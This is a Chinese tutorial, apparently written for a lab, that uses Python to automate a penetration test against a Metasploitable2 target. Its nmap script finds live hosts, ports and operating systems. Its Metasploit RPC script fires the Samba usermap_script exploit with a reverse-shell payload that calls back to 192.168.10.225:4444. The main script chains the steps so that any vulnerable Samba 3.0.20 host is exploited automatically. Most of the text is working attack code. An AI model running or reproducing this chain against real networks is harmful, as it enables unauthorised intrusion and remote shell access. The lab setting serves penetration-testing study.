一、介绍

   本文主要实现了对网络中主机的自动化扫扫描，然后对存活的主机进行漏洞探测。

二、测试环境

   在Kali Linux 2020上运行python脚本，网络中部署一台Metasploitable2作为靶机测试。

三、Python脚本

2.1 Nmap脚本

   通过nmap_test.py实现对网络中存活的主机进行扫描，之后再进行主机端口、系统的探测。

#!/usr/bin/python3
# -*- coding=utf-8 -*-
import nmap
def nmap_host_scan(net):
    nm=nmap.PortScanner()
    res_scan=nm.scan(hosts=net,arguments="-sn -PE -n")
    print("starting:"+res_scan["nmap"]["command_line"])
    host_list=[]
    for ip in res_scan["scan"]:
        try:
            if res_scan["scan"][ip]["status"]["state"]=="up":
                IP=res_scan["scan"][ip]["addresses"]["ipv4"]
                host_list.append(IP)
        except Exception:
            pass
    return host_list
def nmap_port_scan(host,port):
    nm=nmap.PortScanner()
    host_port_os = []
    for ip in host:
        res_scan=nm.scan(hosts=ip,ports=port,arguments=" -A -O")
        print("starting:" + res_scan["nmap"]["command_line"])
        for ip in res_scan["scan"]:
            host_dic = {ip: {"tcp_port": {}, "os": []}}
            try:
                for p in res_scan["scan"][ip]["tcp"]:
                    host_dic[ip]["tcp_port"][p]={}
                    host_dic[ip]["tcp_port"][p]["product"]=res_scan["scan"][ip]["tcp"][p]["product"]
                    host_dic[ip]["tcp_port"][p]["version"] = res_scan["scan"][ip]["tcp"][p]["version"]
                host_dic[ip]["os"].append(res_scan["scan"][ip]["osmatch"][0]["name"])
                host_port_os.append(host_dic)
            except Exception as e:
                print("Eorr:",e)
                pass
    return host_port_os

2.2 msfrpc脚本

   通过pymsf.py调用kali中的metasploit来进行主机漏洞的探测。

#!/usr/bin/python3
# -*- coding=utf-8 -*-
from pymetasploit3.msfrpc import MsfRpcClient
import time
client = MsfRpcClient(username="ww",password="pwd@123", server="127.0.0.1", ssl=False )

def smb_test(host):
    exploit = client.modules.use('exploit', 'multi/samba/usermap_script')
    exploit["RHOSTS"] = host
    exploit["RPORT"] = "139"

    payload = client.modules.use('payload', 'cmd/unix/reverse')
    payload['LHOST'] = "192.168.10.225"
    payload['LPORT'] = "4444"

    mysession = exploit.execute(payload=payload)
    time.sleep(3)
    print(mysession)
    if mysession["job_id"] != None:
        print("漏洞存在，获取到shell如下：")
        print(client.sessions.list)

2.3 main脚本

   通过main.py，调用nmap_test.py，pymsf.py实现主机探测，端口探测，漏洞渗透。

#!/usr/bin/python3
# -*- coding=utf-8 -*-
import re
from nmap_test import nmap_host_scan,nmap_port_scan
from pymsf import smb_test
if __name__=="__main__":
    print("--------第一阶段 探测主机--------")
    net=input("net/mask:")
    ip_up=nmap_host_scan(net)
    for i in ip_up:
        print(i + " is UP!")
    print("--------第二阶段 探测端口--------")
    host_port_os=nmap_port_scan(ip_up,"10-150")
     print("各主机开放的TCP端口与操作系统如下：")
    for i in host_port_os:
        print(i)
    print("--------第三阶段 漏洞探测--------")
    for i in host_port_os:
        for j in i:
            for x in i[j]["tcp_port"]:
                ver=i[j]["tcp_port"][x]["version"]
                if x == 139 and re.match(".*3.0.20*.",ver):
                    print("-----探测SMB漏洞-----")
                    smb_test(j)

四、测试效果

   运行main脚本效果如下，在输入需要扫描的网段之后，自动开始主机探测并打印出存活的主机，完成后执行端口探测与系统探测并打印出每台主机开放的端口及端口运行的服务和主机运行的系统；最后选择可能存在的漏洞的服务进行漏洞渗透获取到Shell。

自动化漏洞探测

参考：GitHub - DanMcInerney/pymetasploit3: Automation library for Metasploit